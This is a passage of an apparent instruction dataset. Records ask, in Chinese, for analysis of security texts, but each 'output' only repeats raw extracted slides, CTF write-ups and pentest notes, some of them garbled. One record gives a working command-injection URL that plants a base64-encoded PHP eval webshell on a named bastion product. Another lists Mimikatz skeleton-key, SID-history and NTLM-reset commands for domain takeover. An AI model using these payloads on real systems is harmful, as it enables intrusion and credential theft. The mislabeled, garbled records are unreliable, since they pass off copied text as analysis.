GET /foo 169.254.169.254 Payload with http://169.254.169.254/foo Definitions: SSRF GET /foo sensitive data sensitive data 169.254.169.254 Payload with http://169.254.169.254/foo Definitions: SSRF If you can relay requests through a GCP or AWS box... Easy things to do with SSRF  AWS, GCP have a gooey center  People have already criticized AWS/GCP for this  file:/// urls  Reflected XSS  Technically not SSRF Definitions: SSRF SSRF: Hard mode  Cross-protocol stuff  SMTP through gopher:// URLs  HTTP->memcached->RCE  See A New Era of SSRF  ??? Definitions: SSRF Apple Pay Web Inductive SSRF Apple Pay: 3 forms Apple Pay In-store In-app Web these are unaffected Apple Pay In-store In-app Web criticising this The intended flow  Safari generates a validationURL (https://apple-pay-gateway-*.apple.com) Apple Pay The intended flow  Safari generates a validationURL (https://apple-pay-gateway-*.apple.com)  Your JS sends validationURL to your backend Apple Pay The intended flow  Safari generates a validationURL (https://apple-pay-gateway-*.apple.com) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMachine Learning Protect against tomorrows threats 基於機器學習的惡 意軟體分類實作:\" Microsoft\"Malware\" Classification\" Challenge\"經驗談 Trend Micro ch0upi miaoski Kyle Chung 2 Dec 2016 Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats ch0upi  Staff\"engineer\"in\"Trend\"Micro  Machine\"Learning\"+\"Data\"Analysis  Threat\"intelligence\"services  KDDCup 2014\"+\"KDDCup 2016:\"Top10  GoTrend:\"6th in\"UEC\"Cup\"2015 Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats miaoski  Senior\"threat\"researcher\"in\"Trend\"Micro  Threat\"intelligence  Smart\"City  SDR  Arduino\"+\"RPi makers  Loves\"cats Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats 4 Outline  Why\"Malware\"Classification?  Machine\"Learning  Microsoft\"Challenge  How\"to\"Solve\"it?  Conclusion Machine Learning Protect against tomorrows threats MALWARE' CLASSIFICATION Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats Whats\"Malware\"Classification?  Identify\"malware\"family Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats Why\"Malware\"Classification?  Know\"how\"to\"clean  Possible\"attribution  Set\"proper\"priority Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats Current\"Malware\"Classification  Manually\"generated\"by\"researchers  Use\"signature\"to\"fingerprint\"malware\"  YARA\"rules Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats Challenge  Manual\"process\"è wrong\"family  more\"and\"more\"malware\"families  Very\"large\"volume  daily\"1M+\"samples  Increasing\"signatures  Slow\"in\"scanning\"+\"need\"more\"storage Machine Learning Protect against tomorrows threats Machine Learning Protect against tomorrows threats BSidesLV 2016:\"VirusShare  John\"Seymour,\"Labeling\"the\"VirusShare Corpus:\" Lessons\"Learned,\"BSidesLV 2016  VirusS", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n祥云杯 Nu1L MISC 进制反转 RAR 伪加密改一下 header解压得到一个音频根据提示对 bit 进行翻转 with open('flag.wav','rb') as f: content = f.read() res = [] for c in content: res.append((~c)&0xff) with open('output.wav','wb') as f: f.write(bytes(res)) 音频翻转https://audioalter.com/reverse/ 在线识别https://www.acrcloud.com/identify-songs-music-recognition-online/ xixixi binwalk 一下看到有个 png 头但文件不完整再翻一翻找到两个 python 脚本参考脚本还 原图片即可 import struct # with open('new.vhd', 'rb') as f: # content = f.read() # res = content.split(b'\\x00'*128) # rres = [] # for i in res: # if i: # rres.append(i.strip('\\x00')) # parts = [] # for idx, val in enumerate(rres): # if 'IHDR' in val: # print(idx, len(val)) # if len(val) > 0 and len(val) % 512 == 0 and val[-1] == '\\xff': # parts.append(val.rstrip('\\xff')) # print(len(parts)) # print(rres[73]) # print('='*50) # print('='*50) # print(rres[74]) class FAT32Parser(object): def __init__(self, vhdFileName): with open(vhdFileName, 'rb') as f: self.diskData = f.read() self.DBR_off = self.GetDBRoff() self.newData = ''.join(self.diskData) def GetDBRoff(self): DPT_off = 0x1BE target = self.diskData[DPT_off+8:DPT_off+12] DBR_sector_off, = struct.unpack(\"<I\", target) return DBR_sector_off * 512 def GetFAT1off(self): target = self.diskData[self.DBR_off+0xE:self.DBR_off+0x10] FAT1_sector_off, = struct.unpack(\"<H\", target) return self.DBR_off + FAT1_sector_off * 512 def GetFATlength(self): target = self.diskData[self.DBR_off+0x24:self.DBR_off+0x28] FAT_sectors, = struct.unpack(\"<I\", target) return FAT_sectors * 512 def GetRootoff(self): FAT_length = self.GetFATlength() FAT2_off = self.GetFAT1off() + FAT_length return FAT2_off + FAT_length def Cluster2FAToff(self, cluster): FAT1_off = self.GetFAT1off() return FAT1_off + cluster * 4 def Cluster2DataOff(self, cluster): rootDir_off = self.GetRootoff() return rootDir_off + (cluster - 2) * 512 output = open('flag.png', 'wb') parser = FAT32Parser('new.vhd') data_off = 0x027bae00 data_length = 9728 data_sector = parser.diskData[data_off:data_off+data_length].", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPentesterAcademy.com PentesterAcademy.com VoIPShark: Open Source VoIP Analysis Platform Nishant Sharma Jeswin Mathai Ashish Bhangale PentesterAcademy.com & AttackDefense.com PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com About Us Me, Nishant Sharma  R&D Manager and Lead Trainer, Pentester Academy  Firmware developer, Enterprise WiFi APs and WIPS Sensors  Masters degree in Infosec  Published research at Blackhat US/Asia, DEF CON USA and other venues Co-authors  Ashish Bhangale, Sr. Security Researcher  Jeswin Mathai, Security Researcher PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com AttackDefense.com PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com Talk Overview  VoIP Basics  SIP, RTP  Secure: TLS, SRTP  Recovering/Decrypting VoIP Calls  Current open source tools and issues  VoIPShark  Architecture and Internals  Analyzing VoIP Traffic  Recovering Calls  Detecting Attacks Passively  Demo PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com VoIP Telephony  Signalling + Media PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com Signalling Protocols SIP (Session Initiation Protocol)  Developed by the IETF  Replacement for the desk phones and PSTN (Public Switched Telephone Network) H.323  Created by the ITU-T  Focused on videoconferencing but also used for voice calls SCCP (Skinny)  Cisco proprietary protocol used for line-side control of phones PentesterAcademy.com PentesterAcademy.com PentesterAcademy.com Session Initiation Protocol  Text-based protocol  Applications  Calls (audio, video) using other media steams like RTP  Text messages using SIP Message method  Works with other protocols  Session Description Protocol (SDP) to define with media negotiation and setup  Can operate over TCP, UDP or SCTP (Stream Control Transmission Protocol)  Security is provided by TLS (Transport Layer Security ) i.e. SIP over TLS. Pentest", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# SecDevice - Exploits --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 大纲 * **身份与访问控制** * [堡垒机](#堡垒机) * [齐治堡垒机](#齐治堡垒机) * [H3C SecParh](#h3c-secparh) * [teleport堡垒机](#teleport堡垒机) * [IMC](#img) * [H3C IMC智能管理中心](#h3c-imc智能管理中心) * **网络检测与响应** * [蜜罐](#蜜罐) * [IDS](#ids) * [绿盟 UTS 综合威胁探针](#绿盟-uts-综合威胁探针) * [防火墙](#防火墙) * [Cisco ASA](#cisco-asa) * [网康下一代防火墙](#网康下一代防火墙) * [启明星辰 天清汉马USG防火墙](#启明星辰-天清汉马usg防火墙) * [佑友防火墙](#佑友防火墙) * [zeroshell](#zeroshell) * [Sophos XG](#sophos-xg) * [网关](#网关) * [上海格尔安全认证网关管理系统](#上海格尔安全认证网关管理系统) * [网康 NS-ASG 安全网关](#网康-ns-asg-安全网关) * [负载均衡](#负载均衡) * [Citrix ADC](#citrix-adc) * [F5 BIG-IP](#f5-big-ip) * [天融信 Top-app LB](#天融信-top-app-lb) * [VPN](#vpn) * [Fortigate SSL VPN](#fortigate-ssl-vpn) * [Palo Alto SSL VPN](#palo-alto-ssl-vpn) * [Pulse Secure SSL VPN](#pulse-secure-ssl-vpn) * [深信服 VPN](#深信服-vpn) * [锐捷 SSL VPN](#锐捷-ssl-vpn) * [威胁感知](#威胁感知) * [Sophos UTM](#sophos-utm) * **终端响应与检测** * [杀软](#杀软) * [EDR](#edr) * [深信服 EDR](#深信服-edr) * [360天擎](#360天擎) * [金山 V8 终端安全系统](#金山-v8-终端安全系统) * [数据防泄漏系统](#数据防泄漏系统) * [天融信数据防泄漏系统](#天融信数据防泄漏系统) --- ## 身份与访问控制 ### 堡垒机 #### 齐治堡垒机 > Fofa: app=\"齐治科技-堡垒机\" **默认口令** - shterm/shterm **齐治堡垒机 ShtermClient-2.1.1 命令执行漏洞** - [齐治堡垒机ShtermClient-2.1.1命令执行漏洞CNVD-2019-09593分析](https://www.cnblogs.com/StudyCat/p/11201725.html) ``` http://10.20.10.11/listener/cluster_manage.php https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}\" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK\"|base64${IFS}- d|bash`|${IFS}|echo${IFS} /var/www/shterm/resources/qrcode/lbj77.php 密码10086 ``` **CNVD-2019-20835 齐治堡垒机前台远程命令执行漏洞** - [齐治堡垒机前台远程命令执行漏洞CNVD-2019-20835分析](https://www.cnblogs.com/StudyCat/p/11256944.html) **CNVD-2019-17294 齐治堡垒机后台存在命令执行漏洞** - [齐治堡垒机后台存在命令执行漏洞CNVD-2019-17294分析](https://www.cnblogs.com/StudyCat/p/11197986.html) **远程代码执行** - POC | Payload | exp ``` POST /shterm/listener/tui_update.php a=[\"t';import", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMimikatz那些鲜为知的功能() #.内渗透/mimikatz author: haya 作为Windows的神兵利器 sekurlsa::logonpasswords  lsadump::dcsync 可能是 Mimikatz使频率较的两个功能了实际上Mimikatz还有很多有意思的功能可以通 过阅读源码进步去了解 本主要是盘点Mimikatz的些冷功能以及这些功能在实战中的具体使场景 1. rpc::server 这个功能主要是启动个rpcserver允许使Windows rpc远程调mimikatz 通过这个RPC远程调功能可以绕过些本地的基于字符串的特征查杀如 Defender即使没有Mimikatz件只是命令特征包含了 sekurlsa::logonpasswords 也 会被查杀 因为 rpc::server 这样的命令并不会查杀这时候可以内存加载Mimikatz启动监听Rpc server注意这的noauth是必须的于远程匿名调 然后本机挂代理即可远程操作这个mimikatz了 Impacket也实现了远程Rpc调mimikatz的功能需账户密码操作如下 Mimikatz实际上也是使了Windows Remote Procedure Call (RPC)关于rpc mimikatz有不少可以学习的知识点会在下期进展开 2. sid::add / sid::patch 这个技巧来于中安星-御守实验室具体原理参考 https://mp.weixin.qq.com/s/OHbFhqyLQlx5W2W40PRoLg 以前跨域常票据+sidhistory的法参考https://adsecurity.org/? p=1640现在使 sid::add 需注票据直接将域域管的sIDHistory属性设置为域域 管的SID摇身变成为根域管理员 privilege::debug sid::patch sid::add /sid:xxx /new:xxx 3. ts::logonpasswords 这是今年新加的功能于抓取明的RDP密码(需要注意的是这和DPAPI解3389连接 密码是两个完全不同的东) 个较常的场景是当域管理员远程RDP到某台服务器时即可通过此命令抓取域管 理员的明密码(域管的密码般较复杂法通过hash解明)这算是为数不多的需 任何修改可以直接抓到明密码的式了 4. misc::skeleton misc::skeleton 这个功能叫万能密码使后所有的域户会多出个额外的 mimikatz万能密码在域控重启后失效这并不算冷的功能但是因为些独特使场景仍 然将其列了出来 使法如上图在DC上执即可多数章讲到当执完上述命令后就可以使 mimikatz作为个万能密码去连接域控 实际场景中这个万能密码对Exchange邮箱接域认证的VPN等使Windows域认 证的服务都是有效的也就是说可以使mimikatz这个通密码去登录邮箱VPN 当然这个固定的mimiktaz密码实战中也容易被别上所以定义这个密码也是有必 要的具体的法会在下期展开 5. lsadump::setntlm 这个功能主要于设置hash,法为 lsadump::setntlm /server:192.168.1.1 /user:test /ntlm:xxxx 还有个修改域户ntlm的法 lsadump::changentlm /server:192.168.1.1 /user:test /old:xxx /newpassword:xxxxx 说起具体使场景不得不提mimikatz dcsync这个家喻户晓的功能般dcsync会使 如下命令 lsadump::dcsync /csv /all /domain:xxx.com 有时候会遇到解不开的hash这时候可以尝试dcsync同步户历史hash的功能如下 图ntlm-0代表的是当前hashntlm-1代表的是上次的hash以此类推 不少户对三个年就改次的密码为了便记忆会依次设置形如 password@2020 password@2021这样的密码通过破解历史密码就可能猜到法破解的 当前密码设置密码直接使 lsadump::setntlm 这样的功能也是分便的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Linux 提权 -- 依赖 exp 篇 ### exp注 ```wiki CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch] CVE-2017-7494 [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE-2017-7308 [a signedness issue in AF_PACKET sockets] (Linux kernel through 4.10.6) CVE-2017-6074 [a double-free in DCCP protocol] (Linux kernel through 4.9.11) CVE-2017-5123 ['waitid()'] (Kernel 4.14.0-rc4+) CVE-2016-9793 [a signedness issue with SO_SNDBUFFORCE and SO_RCVBUFFORCE socket options] (Linux kernel before 4.8.14) CVE-2016-5195 [Dirty cow] (Linux kernel>2.6.22 (released in 2007)) CVE-2016-2384 [a double-free in USB MIDI driver] (Linux kernel before 4.5) CVE-2016-0728 [pp_key] (3.8.0, 3.8.1, 3.8.2, 3.8.3, 3.8.4, 3.8.5, 3.8.6, 3.8.7, 3.8.8, 3.8.9, 3.9, 3.10, 3.11, 3.12, 3.13,3.4.0, 3.5.0, 3.6.0, 3.7.0, 3.8.0, 3.8.5, 3.8.6, 3.8.9, 3.9.0, 3.9.6,3.10.0, 3.10.6, 3.11.0, 3.12.0, 3.13.0, 3.13.1) CVE-2015-7547 [glibc getaddrinfo] (before Glibc 2.9) CVE-2015-1328 [overlayfs] (3.13, 3.16.0, 3.19.0) CVE-2014-5284 [OSSEC] (2.8) CVE-2014-4699 [ptrace] (before 3.15.4) CVE-2014-4014 [Local Privilege Escalation] (before 3.14.8) CVE-2014-3153 [futex] (3.3.5 ,3.3.4 ,3.3.2 ,3.2.13 ,3.2.9 ,3.2.1 ,3.1.8 ,3.0.5 ,3.0.4 ,3.0.2 ,3.0.1 ,2.6.39 ,2.6.38 ,2.6.37 ,2.6.35 ,2.6.34 ,2.6.33 ,2.6.32 ,2.6.9 ,2.6.8,2.6.7 ,2.6.6 ,2.6.5 ,2.6.4 ,3.2.2 ,3.0.18 ,3.0 ,2.6.8.1) CVE-2014-0196 [rawmodePTY] (2.6.31, 2.6.32, 2.6.33, 2.6.34, 2.6.35, 2.6.36, 2.6.37, 2.6.38, 2.6.39, 3.14, 3.15) CVE-2014-0038 [timeoutpwn] (3.4, 3.5, 3.6, 3.7, 3.8, 3.8.9, 3.9, 3.10, 3.11, 3.12, 3.13, 3.4.0, 3.5.0, 3.6.0, 3.7.0, 3.8.0, 3.8.5, 3.8.6, 3.8.9, 3.9.0, 3.9.6, 3.10.0, 3.10.6, 3.11.0, 3.12.0, 3.13.0, 3.13.1) CVE-2013-2094 [perf_swevent] (3.0.0, 3.0.1, 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2, 3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.4.4,3.4.5, 3.4.6, 3.4.8, 3.4.9, 3.5, 3.6, 3.7, 3.8.0, 3.8.1, 3.8.2, 3.8.3,3.8.4, 3.8.5, 3.8.6, 3.8.7, 3.8.8, 3.8.9) CVE-2013-1858 [clown-newuser] (3.3-3.8) ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Tamarin (re, 224p, 42 solved) We're given an android apk that has a single text entry that acts as a flag check: ![](scr.png) The apk turns out to be a Ahead-Of-Time compiled Xamarin application. When searching for xamarin internals, we've came across a very [helpful SO thread](https://reverseengineering.stackexchange.com/questions/16508/unpacking-xamarin-mono-dll-from-libmonodroid-bundle-app-so) that presents a simple python script for extracting .NET dlls from `libmonodroid_bundle_app.so`. This, surprisingly, give us a PE file that contains the flag checker method: ```c# using System; using Android.App; using Android.Content.PM; using Android.OS; using Android.Runtime; using Android.Support.V7.App; using Android.Widget; using Core; using Xamarin.Essentials; namespace Tamarin { // Token: 0x02000002 RID: 2 [Activity(Label = \"@string/app_name\", Theme = \"@style/AppTheme\", MainLauncher = true)] public class MainActivity : AppCompatActivity { // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250 protected override void OnCreate(Bundle savedInstanceState) { base.OnCreate(savedInstanceState); Platform.Init(this, savedInstanceState); this.SetContentView(2131427356); EditText flagText = base.FindViewById<EditText>(2131230795); Button button = base.FindViewById<Button>(2131230763); string empty = string.Empty; button.Click += delegate(object sender, EventArgs e) { if (Check.Func4(flagText.Text)) { flagText.Text = \"The flag is TWCTF{\" + flagText.Text + \"}\"; return; } flagText.Text = \"Invalid\"; }; } // Token: 0x06000002 RID: 2 RVA: 0x000020B1 File Offset: 0x000002B1 public override void OnRequestPermissionsResult(int requestCode, string[] permissions, [GeneratedEnum] Permission[] grantResults) { Platform.OnRequestPermissionsResult(requestCode, permissions, grantResults); base.OnRequestPermissionsResult(requestCode, permissions, grantResults); } } } ``` `Check.Func4` being the core flag check function. Generally, it cuts the input text into chunks and converts t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Advanced Wireless Attacks Against Enterprise Networks Course Guide Version 1.0.2 Gabriel Ryan @s0lst1c3 @gdssecurity gryan@gdssecurity.com solstice.me 2 Introduction ........................................................................................................................... 3 Lab Setup Guide ...................................................................................................................... 3 Target Identification Within A Red Team Environment ........................................................... 3 Chapter Overview .......................................................................................................................................... 3 Scoping A Wireless Assessment: Red Team Style .......................................................................................... 5 Linguistic Inference .................................................................................................................................... 5 Sequential BSSID Patterns ......................................................................................................................... 5 OUI Prefixes ............................................................................................................................................... 6 Using Geographic Cross-Referencing To Identify In-Scope Access Points .................................................... 6 Expanding The Scope By Identifying Sequential BSSIDs ................................................................................ 7 Attacking And Gaining Entry To WPA2-EAP Wireless Networks ............................................... 9 Chapter Overview .......................................................................................................................................... 9 Wireless Theory: Evil Twin Attacks ................................................................................................................ 9 Wireless Theory:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 文档更新 ## 19/3/2019 1. 修复了 [Isssue#3 第1章 赛前准备安装(商用 ATT&CK 矩阵 - Windows版图片内容重复)](https://github.com/Snowming04/The-Hacker-Playbook-3-Translation/issues/3)<br>修改了第一章的图片 1-2.PNG该图片存在图片内容重复的问题已经进行替换<br>感谢 [@MyKings](https://github.com/MyKings) 的宝贵建议 2. 第1章新增了一张图片 1-16.PNG 3. 修复了 [Isssue#5 第1章 赛前准备安装=>设置你的外部服务器(Digital Dcean应为Digital Ocean)](https://github.com/Snowming04/The-Hacker-Playbook-3-Translation/issues/5)<br>感谢 [@WMJ](https://github.com/StefanoWen) 的宝贵建议 4. 修复了 [Isssue#6 第1章APT组织与方法持续更新列表的链接有误](https://github.com/Snowming04/The-Hacker-Playbook-3-Translation/issues/6)<br>感谢 [@dom2q](https://github.com/dom2q) 的宝贵建议 ## 23/5/2019 感谢 [@y159357](https://github.com/y159357) 的宝贵建议 >以下是我在复现中遇到的一些问题如果是我的错误还请译者纠正<br> >1.在pdf中34页knockpy的使用中提到了使用-u参数我在复现时发现貌似没有这个参数所以我使用了-w参数<br> >2.在pdf中36页git-all-secrets的使用中提到了将结果文件从容器中提取到主机我想那段代码并不完全在那段代码结尾没有指明将目标文件提取到主机的哪个文件我想应该改为 docker cp <container-id>:/data/results.txt ./results.txt 改正了第二章里面的两个问题 ## 3/7/2019 > 首先我们需要设置一个 VPS 服务器启用开放到公网的多个端口用 **PTF** 配置 Metasploit并用 Meterpreter 攻陷最初的受害者我们也可以用 Cobalt Strike 或其他框架来实现这一点但在本例中我们将使用 Meterpreter 感谢 @蝶离飞 师傅的宝贵建议已把 `PTF` 更正为 `PTH` >如果你幸运地获得了一个 SSH shell那么我们可以通过该系统进行渗透我们如何获得 SSH shell 呢在许多情况下一旦我们可以实现本地文件包含LFI或远程代码执行RCE我们可以尝试权限升级以读取 /etc/shadow 文件和密码破解或者我们可以利用一些 **Mimimikatz** 风格的方法 感谢 @蝶离飞 师傅的宝贵建议已把 `Mimimikatz` 更正为 `Mimikatz`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n**Authors**: < [nixawk](https://github.com/nixawk) >, < [sjas](https://github.com/sjas) > ---- # CTFS & PentestLab The stronger you want to become, the more exercises you need. # Links 1. https://www.vulnhub.com/ 2. https://www.pentesterlab.com/ 3. http://www.amanhardikar.com/mindmaps/Practice.html 4. http://r-7.co/Metasploitable2", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMachine Duping Pwning Deep Learning Systems CLARENCE CHIO MLHACKER @cchio adapted from Dave Conway HACKING MATH & STATS MACHINE LEARNING 1337 HAX0R ACADEMIC RESEARCH Deep Learning deep neural networks (DNN)  Not a new toy - history goes back to 1943  MUCH MORE DATA EVERYWHERE  Revived due to improvements in computational hardware (esp. GPUs)  Multiple concurrent matrix operations can be performed  MYTH: Modeled after how the human brain works Nvidia ImageNet Google Inc. Google DeepMind UMass, Facial Recognition Nvidia DRIVE Nvidia Invincea Malware Detection System Deep Learning why would someone choose to use it? (Semi)Automated feature/representation learning One infrastructure for multiple problems (sort of) Hierarchical learning: Divide task across multiple layers Efficient, easily distributed & parallelized Definitely not one-size-fits-all Source: Deep Learning: Goodfellow et. al. softmax function [0.34, 0.57, 0.09] predicted class: 1 correct class: 0 np.argmax logits prediction 풇 hidden layer input layer output layer 푊 activation function bias units 4-5-3 Neural Net Architecture [17.0, 28.5, 4.50] 풇 풇 풇 풇 풇 풇 풇 풇 풇 풇 풇 Training Deep Neural Networks Step 1 of 2: Feed Forward 1. Each unit receives output of the neurons in the previous layer (+ bias signal) 2. Computes weighted average of inputs 3. Apply weighted average through nonlinear activation function 4. For DNN classifier, send final layer output through softmax function softmax function [0.34, 0.57, 0.09] logits prediction 풇 푊1 activation function [17.0, 28.5, 4.50] 풇 풇 activation function activation function input 푊2 b1 b2 bias unit bias unit Training Deep Neural Networks Step 2 of 2: Backpropagation 1. If the model made a wrong prediction, calculate the error 1. In this case, the correct class is 0, but the model predicted 1 with 57% confidence - error is thus 0.57 2. Assign blame: trace backwards to find the units that contributed to this wrong prediction (and how much they contributed to the total error) 1. P", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSo Many Ways to Slap a YoHo: Hacking Facebook & YoVille Sean Barnum, Cybersecurity Principal MITRE EvilAdamSmith, Sr. Security Consultant Tom Stracener Strace, Contract Engineer MITRE Misclaneous Disclaimers  Stracener, Tom 2010 Its Medicinal!  Stracener, Tom 2010 What is YoVille?  Stracener, Tom 2010 What is YoVille?  Stracener, Tom 2010 Roadmap 1) Introduction 2) Client-side trust attacks within Application APIs 3) Attack Patterns Against Social Network Gaming 4) Impact of the attacks using YoVille as an example 5) How to keep your software off the stage at DEF CON  Stracener, Tom 2010 Client-Side Trust User Gateway App X-Application Trust APP2 Client-Side Trust APP1  Stracener, Tom 2010 Attack Characteristics Amplification: Attacker can use one compromised account to attack that users friends via social gaming. Deception: Phishers can create messages to lure users to click on malicious links or buttons, in some cases with the URI masked Easy to Exploit: By using a MITM proxy an attacker can create fake but legitimate looking prizes, gifts, or awards. Manipulating the API is trivial.  Stracener, Tom 2010 Attack Characteristics Trust: Since the attacks often originate from in-game friends or neighbors there is a greater tendency to trust the content as legitimate Stealth: Because the attacks happen at the layer of application logic they are very difficult to detect (i.e. no noisy metacharacters or scripts). Urgency: Users are trained to quickly click and claim items their friends discover before the item expires or is used up.  Stracener, Tom 2010 Attack Patterns for Client-Side Trust 1) Application API Manipulation via Man-in-the-Middle 2) Application API Content Spoofing via API Manipulation 3) Transaction or Event Tampering via API Manipulation 4) Transaction or Event Replay via API Manipulation  Stracener, Tom 2010 Attacks can prey on users interests or vanity The best kind of lies are those we want to be believe Clicking Allow takes you to a Adobe PDF exploit ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Smali ## 介绍 在执行 Android Java 层的代码时其实就是 Dalvik(ART) 虚拟机使用 C或 C++ 代码实现在解析 Dalvik 字节码从而模拟程序的执行过程 自然Dalvik 字节码晦涩难懂研究人员们给出了 Dalvik 字节码的一种助记方式smali 语法通过一些工具如 apktool我们可以把已有的 dex 文件转化为若干个 smali 文件**一般而言一个 smali 文件对应着一个类**然后进行阅读对于不同的工具来说其转换后的 smali 代码一般都不一样毕竟这个语法不是官方的标准这里我们介绍比较通用的语法值得注意的是在smali 语法中使用的都是寄存器但是其在解释执行的时候很多都会映射到栈中 **感觉似乎这里给个例子比较合适** ## 基本结构 一个 Smali 文件的基本信息如下 - 基本类信息 - 前三行描述转换为该 Smali 文件的类的信息 - 如果类实现了接口对应的接口信息 - 如果类使用了注解对应的注解信息 - 字段描述 - 方法描述 比较有意思的是Smali 代码基本上还原了 java 代码中含义它主要有以下两种类型的语句 - 声明语句用来声明 java 中自顶向下的类方法变量类型以及每个方法中所要使用的寄存器的个数等信息 - 执行语句来执行 java 中的每一行代码包含方法的调用字段的读写异常的捕捉等操作 整体来说Smali 代码的可读性还是比较强的 ## 声明语句 在 smali 代码中声明语句一般都是以 `.` 开始 ### 寄存器 目前Dalvik 使用的寄存器都是 32 位对于 64 位类型的变量如 double 类型它会使用两个相邻的 32 位寄存器来表示 此外我们知道 Dalvik 最多支持 65536 个寄存器(编号从 0~65535 )但是 ARM 架构的 cpu 中只有 37 个寄存器那 Dalvik 是怎么做的呢其实每个 Dalvik 虚拟机维护了一个调用栈该调用栈用来支持虚拟寄存器和真实寄存器相互映射的 #### 寄存器声明 在执行具体方法时Dalvik 会根据 `.registers` 指令来确定该函数要用到的寄存器数目虚拟机会根据申请的寄存器的数目来为该方法分配相应大小的栈空间dalvik 在对这些寄存器操作时其实都是在操作栈空间 #### 寄存器命名规则 一个方法所申请的寄存器会分配给函数方法的参数 (parameter) 以及局部变量 (local variable) 在 smali 中一般有两种命名规则 - v 命名法 - p 命名法 假设方法申请了 m+n 个寄存器其中局部变量占 m 个寄存器参数占 n 个寄存器对于不同的命名规则其相应的命名如下 | 属性 | v命名法 | p命名法 | | :------: | :-----------------------: | :-------------------: | | 局部变量 | $v_0,v_1,...,v_{m-1}$ | $v_0,v_1,...,v_{m-1}$ | | 函数参数 | $v_m,v_{m+1},...,v_{m+n}$ | $p_0,p_1,...,p_{n-1}$ | 一般来说我们更倾向于 p 命名法因为其具有较好的可读性可以方便地让我们知道寄存器属于哪一种类型 而这其实也就是 smali 语法中常见的寄存器命名规则p 开头的寄存器都是参数寄存器v 开头的寄存器都是局部变量寄存器两者的数量之和为方法申请的寄存器数量 ### 变量类型 在 Dalvik 字节码中变量主要分为两种类型 | 类型 | 成员 | | ---- | ---------------------------------------- | | 基本类型 | booleanbyteshortcharintlongfloatdoublevoid只用于返回值类型 | | 引用类型 | 对象数组 | 但是我们在 smali 中其实并不需要把一个变量的类型的描述的全称全部放进去我们只需要可以识别它即可那我们可以怎么做呢可以对它进行简写啊dalvik 中简写方式如下 | java类型 | 类型描述符 | | :-----: | :---: | | boolean | Z | | byte | B | | short | S | | char | C | | int | I | | long | J | | float | F | | double | D | | void | V | | 对象类型 | L | | 数组类型 | [ | 其中对象类型可以表示Java代码中的所有类比如说如果一个类在java代码中的以package.name.ObjectName全名的方式被引用那么在Davilk中其描述则", "category": "text_analysis", "source": "security_papers"}
